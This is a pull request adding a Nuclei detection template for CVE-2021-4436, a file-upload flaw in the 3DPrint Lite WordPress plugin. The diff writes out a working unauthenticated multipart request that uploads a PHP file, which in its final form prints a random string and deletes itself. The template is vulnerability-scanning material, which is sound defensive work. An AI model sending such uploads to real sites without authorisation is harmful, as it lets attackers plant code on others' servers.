### PR TITLE
add cve-2021-4436

### DIFF
--- a/http/cves/2021/CVE-2021-4436.yaml
+++ b/http/cves/2021/CVE-2021-4436.yaml
@@ -1,0 +1,58 @@
+id: CVE-2021-4436
+
+info:
+  name: 3DPrint Lite < 1.9.1.5 - Arbitrary File Upload
+  author: securityforeveryone
+  severity: critical
+  description: |
+    The plugin does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.
+  remediation: Fixed in 1.9.1.5
+  reference:
+    - https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-4436
+    - https://github.com/fkie-cad/nvd-json-data-feeds
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-4436
+    cwe-id: CWE-434
+    epss-score: 0.00412
+    epss-percentile: 0.73863
+    cpe: cpe:2.3:a:wp3dprinting:3dprint_lite:*:*:*:*:*:wordpress:*:*
+  metadata:
+    vendor: wp3dprinting
+    product: 3dprint_lite
+    framework: wordpress
+  tags: wpscan,wordpress,intrusive,cve2021,cve
+
+http:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353
+
+        -----------------------------54331109111293931601238262353
+        Content-Disposition: form-data; name="action"
+
+        p3dlite_handle_upload
+        -----------------------------54331109111293931601238262353
+        Content-Disposition: form-data; name="file"; filename="vuln_check.php"
+        Content-Type: text/php
+
+        <?php echo 'Vuln Check'; ?>
+        -----------------------------54331109111293931601238262353--
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"jsonrpc":"2.0"'
+          - '"filename"'
+          - '_vuln_check.php'
+        condition: and
+
+      -  type: status
+         status:
+           - 200

--- a/http/cves/2021/CVE-2021-4436.yaml
+++ b/http/cves/2021/CVE-2021-4436.yaml
@@ -53,6 +53,6 @@ http:
           - '_vuln_check.php'
         condition: and
 
-      -  type: status
-         status:
-           - 200
+      - type: status
+        status:
+          - 200

--- a/http/cves/2021/CVE-2021-4436.yaml
+++ b/http/cves/2021/CVE-2021-4436.yaml
@@ -20,10 +20,17 @@ info:
     epss-percentile: 0.73863
     cpe: cpe:2.3:a:wp3dprinting:3dprint_lite:*:*:*:*:*:wordpress:*:*
   metadata:
+    verified: true
+    max-request: 1
     vendor: wp3dprinting
     product: 3dprint_lite
     framework: wordpress
-  tags: wpscan,wordpress,intrusive,cve2021,cve
+    publicwww-query: "/wp-content/plugins/3dprint-lite/"
+  tags: cve,cve2021,3dprint-lite,file-upload,instrusive,wpscan,wordpress,wp-plugin,intrusive
+
+variables:
+  string: "{{randstr}}"
+  filename: "{{to_lower(rand_text_alpha(5))}}"
 
 http:
   - raw:
@@ -37,10 +44,10 @@ http:
 
         p3dlite_handle_upload
         -----------------------------54331109111293931601238262353
-        Content-Disposition: form-data; name="file"; filename="vuln_check.php"
+        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
         Content-Type: text/php
 
-        <?php echo 'Vuln Check'; ?>
+        <?php echo "{{string}}";unlink(__FILE__);?>
         -----------------------------54331109111293931601238262353--
 
     matchers-condition: and
@@ -49,8 +56,8 @@ http:
         part: body
         words:
           - '"jsonrpc":"2.0"'
-          - '"filename"'
-          - '_vuln_check.php'
+          - '"filename":'
+          - '{{filename}}.php'
         condition: and
 
       - type: status


### PR DESCRIPTION
CVE-2021-4436
poc: https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282/

my test: <img width="617" alt="2021" src="https://github.com/projectdiscovery/nuclei-templates/assets/90972683/8136c26a-0c70-4837-ab3f-f7b19b034e42">



I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)